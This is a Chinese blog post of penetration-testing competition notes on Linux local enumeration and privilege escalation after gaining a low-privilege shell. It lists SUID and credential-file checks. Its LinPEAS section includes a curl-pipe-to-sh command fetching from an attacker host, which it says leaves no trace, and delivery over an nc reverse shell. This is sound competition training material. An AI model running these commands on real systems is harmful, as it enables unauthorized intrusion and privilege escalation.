Linux 本地枚举与信息收集标准工作流 (SOP)
在获取 Linux 系统的低权限 Shell 后,本地信息收集是决定提权路径的核心环节。其核心目标是通过系统化的信息搜集,绘制出当前运行环境的全貌,并识别潜在的配置缺陷或内核漏洞。
标准的枚举流程分为手工枚举与自动化枚举两个阶段。
建议直接跑自动化脚本,自动化脚本跑完根据经验来手动收集信息
手工枚举流程
手工枚举的目标是在不依赖外部脚本的情况下,快速摸清当前机器的核心状况。在比赛中遇到无法上传文件或环境受限(如没有 curl/wget)时,这是破局的唯一方法。
系统与架构信息
确认目标是什么系统、什么架构、内核版本有多老。如果内核版本在特定区间(如 2.6.x 或 3.x 到 5.x 早期),往往可以直接考虑 Dirty COW (CVE-2016-5195) 或 Dirty Pipe (CVE-2022-0847) 等经典内核漏洞。
1 | uname -a # 查看内核版本、系统架构 (x86 还是 x64) |
用户与权限状态(优先级:最高)
明确“我是谁”、“还有谁”、“我能免密执行什么”。
1 | whoami # 查看当前用户名 |
网络与路由
了解靶机在内网中的位置,寻找是否有隐藏的服务仅对本地 127.0.0.1 开放。
1 | ip a || ifconfig # 查看所有网卡 IP |
进程与计划任务
寻找以 root 身份运行的脆弱进程、不安全的定时任务。
1 | ps aux | grep root # 查看 root 运行的进程 |
文件系统与配置缺陷 (核心提权点)
寻找错误配置的权限,这是最常考的提权点。
1. 危险权限查找
1 | # 【经典】查找 SUID 文件 (运行该文件时会临时继承其 root 权限) |
2. 环境探测 (红队精髓)
在你决定用什么语言写反弹 Shell 或提权脚本前,必须先摸清靶机上装了什么
1 | #一键探测靶机上安装了哪些常用环境和黑客工具 (红队图12) |
3. 敏感信息搜索
1 | # 检查关键密码文件权限 (如果 shadow 全局可读,直接拿去爆破哈希) |
自动化枚举
核心解题思维:LinPEAS 一把梭
在 ISW 这种时间紧迫的综合渗透比赛中,这篇笔记只讲一个工具:LinPEAS。熟练掌握 LinPEAS 的投递和结果阅读,足以应对绝大多数提权场景。
下载LinPEAS (攻击机端)
在比赛开始前,你的 Kali 机里必须常备最新版的 LinPEAS。下载最新稳定版 linpeas.sh 到你的常用工作目录:
我放在 ~/ISW_Workspace/Tools里了
1 | wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh |
把LinPEAS部署到靶机
比赛中靶机的情况千奇百怪(没网、没 curl、没 wget、目录不可写)。以下是三种将 LinPEAS 送进靶机并运行的万能方法,按优先级尝试:
靶机有网,或与攻击机网络互通
在你的 Kali (攻击机) 上:
1 | # 开启 HTTP 服务 (假设 linpeas.sh在当前目录) |
在靶机上(直接内存执行,不留痕迹):
1 | curl -L http://<Kali-IP>/linpeas.sh | sh |
断网且无下载工具(Base64 大法)
如果靶机连 curl 和 wget 都没有,或者防火墙拦了入站请求。在你的 Kali (攻击机) 上:
1 | # 将脚本压缩并进行 base64 编码,去掉换行符 |
在靶机上:
1 | # 进入一个大概率可写的目录 |
极其受限的 Shell(直接通过 SSH/NC 喂进去)
如果你是通过 nc 反弹的 shell,可以在 Kali 本地直接把脚本“喂”给建立好连接的端口:
1 | nc -lvnp 4444 < linpeas.sh |
如何使用LinPEAS
把脚本弄上去之后,怎么跑也是有讲究的。直接运行输出太多容易刷屏,推荐以下几种实战跑法:
标准跑法带日志记录 (推荐)
直接运行会把终端刷满,导致你往回翻的时候卡顿或者信息丢失。使用 tee 命令可以边看边把结果存入文件,带上 -r 还能保留颜色编码(颜色极其重要!):
1 | ./linpeas.sh | tee peass.out |
全面深度扫描 (耗时较长,没思路时用)
加上 -a 参数会执行最彻底的系统检查(包括搜索所有的隐藏文件、深入读取日志等)。
1 | ./linpeas.sh -a | tee peass.out |
极速模式 (时间紧迫时用)
如果你只想快速看一眼内核漏洞和基础的配置错误,跳过耗时的文件系统深度搜索:
1 | ./linpeas.sh -s |
如何分析LinPEAS 的输出
LinPEAS 运行时会输出几千行,只需要注意下面三种颜色:
红黄高亮
含义:极高概率的提权点。
常见命中:存在严重的内核 CVE 漏洞 (如 Dirty COW)。
当前用户有
NOPASSWD的 sudo 权限。极度危险的 SUID 文件。
动作:看到红黄底色,直接去GTFOBins 查怎么打。
纯红色
含义:安全配置错误或敏感信息泄露。
常见命中:/etc/shadow文件可读。在
.bash_history或某处的.conf文件里找到了明文密码不安全的计划任务 (Cron Jobs) 指向了你能修改的脚本。
如果红黄色没出结果,把所有红色的字仔细过一遍。
青色/蓝色
- 帮你快速定位哪些进程是你这个普通用户运行的。
- 本文链接: http://example.com/2026/03/15/ISW/Linux本地提权/Linux提权1_本地枚举与信息收集指南/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
欢迎关注我的其它发布渠道